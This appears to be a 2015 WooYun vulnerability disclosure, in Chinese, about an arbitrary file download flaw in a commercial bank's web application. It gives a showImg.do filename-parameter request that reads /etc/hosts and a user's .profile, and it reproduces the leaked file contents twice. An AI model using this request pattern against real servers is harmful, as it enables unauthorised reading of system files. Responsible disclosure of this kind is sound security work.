某商业银行存在系统文件任意下载漏洞

漏洞概要

缺陷编号:WooYun-2015-0125479

漏洞标题:某商业银行存在系统文件任意下载漏洞

相关厂商:某商业银行

漏洞作者:JotPot

提交时间:2015-07-10 21:10

公开时间:2015-08-24 12:02

漏洞类型:任意文件遍历/下载

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签:

漏洞详情

披露状态:

2015-07-10: 细节已通知厂商并且等待厂商处理中
2015-07-10: 厂商已经确认,细节仅向厂商公开
2015-07-20: 细节向核心白帽子及相关领域专家公开
2015-07-30: 细节向普通白帽子公开
2015-08-09: 细节向实习白帽子公开
2015-08-24: 细节向公众公开

简要描述:

吴江商业银行存在系统文件任意下载漏洞

详细说明:

1.hosts文件http://**.**.**.**/showImg.do?filename=/etc/hosts##hosts This file describes a number of hostname-to-address# mappings for the TCP/IP subsystem. It is mostly# used at boot time, when no name servers are running.# On small systems, this file can be used instead of a# "named" name server.# Syntax:## IP-Address Full-Qualified-Hostname Short-Hostname#**.**.**.** localhost# special IPv6 addresses::1 localhost ipv6-localhost ipv6-loopbackfe00::0 ipv6-localnetff00::0 ipv6-mcastprefixff02::1 ipv6-allnodesff02::2 ipv6-allroutersff02::3 ipv6-allhosts**.**.**.** zxzp zxzp2. profile文件http://**.**.**.**/showImg.do?filename=/home/zxzp/.profile# Sample .profile for SuSE Linux# rewritten by Christian Steinruecken <[email protected]>## This file is read each time a login shell is started.# All other interactive shells will only read .bashrc; this is particularly# important for language settings, see below.test -z "$PROFILEREAD" && . /etc/profile |true# Most applications support several languages for their output.# To make use of this feature, simply uncomment one of the lines below or# add your own onesee /usr/share/locale/locale.alias for more codes)# This overwrites the system default set in /etc/sysconfig/language# in the variable RC_LANG.##export LANG=de_DE.UTF-8 # uncomment this line for German output#export LANG=fr_FR.UTF-8 # uncomment this line for French output#export LANG=es_ES.UTF-8 # uncomment this line for Spanish output# Some people don't like fortune. If you uncomment the following lines,# you will have a fortune each time you log in ;-)#if [ -x /usr/bin/fortune ] ; then# echo# /usr/bin/fortune# echo#fiexport JAVA_HOME=/opt/IBM/WebSphere/AppServer/javaexport PATH=$JAVA_HOME/bin:$PATHexport CLASSPATH=.:$JAVA_HOME/lib/dt.jar:$JAVA_HOME/lib/tools.jarset -o vi

漏洞证明:

1.hosts文件http://**.**.**.**/showImg.do?filename=/etc/hosts## hosts This file describes a number of hostname-to-address# mappings for the TCP/IP subsystem. It is mostly# used at boot time, when no name servers are running.# On small systems, this file can be used instead of a# "named" name server.# Syntax:## IP-Address Full-Qualified-Hostname Short-Hostname#**.**.**.** localhost# special IPv6 addresses::1 localhost ipv6-localhost ipv6-loopbackfe00::0 ipv6-localnetff00::0 ipv6-mcastprefixff02::1 ipv6-allnodesff02::2 ipv6-allroutersff02::3 ipv6-allhosts**.**.**.** zxzp zxzp2. profile文件http://**.**.**.**/showImg.do?filename=/home/zxzp/.profile# Sample .profile for SuSE Linux# rewritten by Christian Steinruecken <[email protected]>## This file is read each time a login shell is started.# All other interactive shells will only read .bashrc; this is particularly# important for language settings, see below.test -z "$PROFILEREAD" && . /etc/profile |true# Most applications support several languages for their output.# To make use of this feature, simply uncomment one of the lines below or# add your own onesee /usr/share/locale/locale.alias for more codes)# This overwrites the system default set in /etc/sysconfig/language# in the variable RC_LANG.##export LANG=de_DE.UTF-8 # uncomment this line for German output#export LANG=fr_FR.UTF-8 # uncomment this line for French output#export LANG=es_ES.UTF-8 # uncomment this line for Spanish output# Some people don't like fortune. If you uncomment the following lines,# you will have a fortune each time you log in ;-)#if [ -x /usr/bin/fortune ] ; then# echo# /usr/bin/fortune# echo#fiexport JAVA_HOME=/opt/IBM/WebSphere/AppServer/javaexport PATH=$JAVA_HOME/bin:$PATHexport CLASSPATH=.:$JAVA_HOME/lib/dt.jar:$JAVA_HOME/lib/tools.jarset -o vi

修复方案:

进行目录控制

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:7

确认时间:2015-07-1012:00

厂商回复:

CNVD确认所述情况,已经转由CNCERT下发给江苏分中心,由其后续协调网站管理单位处置。

最新状态:

暂无

评价